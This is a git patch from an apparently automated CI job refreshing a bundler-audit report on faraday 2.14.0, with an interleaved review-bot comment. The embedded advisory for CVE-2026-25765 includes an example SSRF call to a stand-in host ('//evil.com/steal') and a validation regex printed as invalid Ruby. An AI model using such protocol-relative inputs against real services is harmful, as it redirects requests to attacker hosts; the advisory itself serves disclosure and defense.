From 82f08296a689ec1a8cc4adebbe23957688e4818c Mon Sep 17 00:00:00 2001
From: cicd
Date: Thu, 12 Feb 2026 08:49:54 +0100
Subject: [PATCH] commit by to_remotes 2026-02-12 08:49:54 +0100 from cicd

---
 bundle-audit-time.txt | 2 +-
 bundle-audit.json | 2 +-
 update-info.txt | 8 +-------
 3 files changed, 3 insertions(+), 9 deletions(-)

diff --git a/bundle-audit-time.txt b/bundle-audit-time.txt
index 481f9cbf..1a59d923 100644
--- a/bundle-audit-time.txt
+++ b/bundle-audit-time.txt
@@ -1 +1 @@
-2026-02-12T08:49:23+01:00
+2026-02-12T08:49:54+01:00
diff --git a/bundle-audit.json b/bundle-audit.json
index ac8a68fd..d3cc644f 100644
--- a/bundle-audit.json
+++ b/bundle-audit.json
@@ -1 +1 @@ -{"version":"0.9.3","created_at":"2026-02-12 08:49:23 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. `//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. 
All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]} \ No newline at end of file +{"version":"0.9.3","created_at":"2026-02-12 08:49:53 +0100","results":[{"type":"unpatched_gem","gem":{"name":"faraday","version":"2.14.0"},"advisory":{"path":"/home/wiseadvice/.local/share/ruby-advisory-db/gems/faraday/CVE-2026-25765.yml","id":"CVE-2026-25765","url":"https://github.com/lostisland/faraday/security/advisories/GHSA-33mh-2634-fwr2","title":"Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url","date":"2026-02-09","description":"### Impact\n\nFaraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`)\nuses Ruby's `URI#merge` to combine the connection's base URL with\na user-supplied path. Per RFC 3986, protocol-relative URLs\n(e.g. 
`//evil.com/path`) are treated as network-path references\nthat override the base URL's host/authority component.\n\nThis means that if any application passes user-controlled input to\nFaraday's `get()`, `post()`, `build_url()`, or other request\nmethods, an attacker can supply a protocol-relative URL like\n`//attacker.com/endpoint` to redirect the request to an\narbitrary host, enabling Server-Side Request Forgery (SSRF).\n\nThe `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts\nURLs starting with `/`, so protocol-relative URLs bypass it entirely.\n\n**Example**\n```ruby\nconn = Faraday.new(url: 'https://api.internal.com')\nconn.get('//evil.com/steal')\n# Request is sent to https://evil.com/steal instead of api.internal.com\n```\n\n### Patches\n\nFaraday v2.14.1 is patched against this security issue. All\nversions of Faraday up to 2.14.0 are affected.\n\n### Workarounds\n\n**NOTE: Upgrading to Faraday v2.14.1+ is the recommended action\nto mitigate this issue, however should that not be an option\nplease continue reading.**\n\nApplications should validate and sanitize any user-controlled\ninput before passing it to Faraday request methods.\nSpecifically:\n\n- Reject or strip input that starts with // followed by a\n non-/ character.\n- Use an allowlist of permitted path prefixes.\n- Alternatively, prepend ./ to all user-supplied paths before\n passing them to Faraday.\n\nExample validation:\n```ruby\ndef safe_path(user_input)\n raise ArgumentError, \"Invalid path\" if user_input.match?(r{\\A//[^/]})\n user_input\nend\n```\n","cvss_v2":null,"cvss_v3":5.8,"cve":"2026-25765","osvdb":null,"ghsa":"33mh-2634-fwr2","unaffected_versions":[],"patched_versions":[">= 2.14.1"],"criticality":"medium"}}]} \ No newline at end of file diff --git a/update-info.txt b/update-info.txt index 20df6d91..551fedcb 100644 --- a/update-info.txt +++ b/update-info.txt 
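Review bot: The new side of bundle-audit.json still records faraday 2.14.0 as an `unpatched_gem` for CVE-2026-25765 (SSRF via protocol-relative URL host override, `"patched_versions":[">= 2.14.1"]`), and the only difference between the old and new line is the `created_at` timestamp, so the finding itself is carried forward unaddressed. A CI job that re-commits a report containing a medium-severity SSRF should fail the pipeline or open a tracking issue rather than silently refresh the artifact; the actual remediation is bumping faraday to 2.14.1 in the lockfile, which is not part of this change. If the upgrade has to wait, note that the workaround snippet embedded in the report is not valid Ruby as printed — the guard should read `raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})` — and that an allowlist of permitted path prefixes is the more robust interim control than a deny-pattern. The report also embeds an absolute home-directory path in `advisory.path` (`/home/wiseadvice/.local/share/...`), which is unnecessary environment detail to publish in a committed artifact and could be stripped or relativised by the job that writes it.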
@@ -1,11 +1,5 @@
 Updating ruby-advisory-db ...
-Updating 1886fa5..826ac19
-Fast-forward
- gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml | 45 ++++++++++++++++++++
- gems/faraday/CVE-2026-25765.yml | 75 ++++++++++++++++++++++++++++++++++
- 2 files changed, 120 insertions(+)
- create mode 100644 gems/bitcoinrb/GHSA-q66h-m87m-j2q6.yml
- create mode 100644 gems/faraday/CVE-2026-25765.yml
+Already up to date.
 Updated ruby-advisory-db
 ruby-advisory-db:
 advisories: 1058 advisories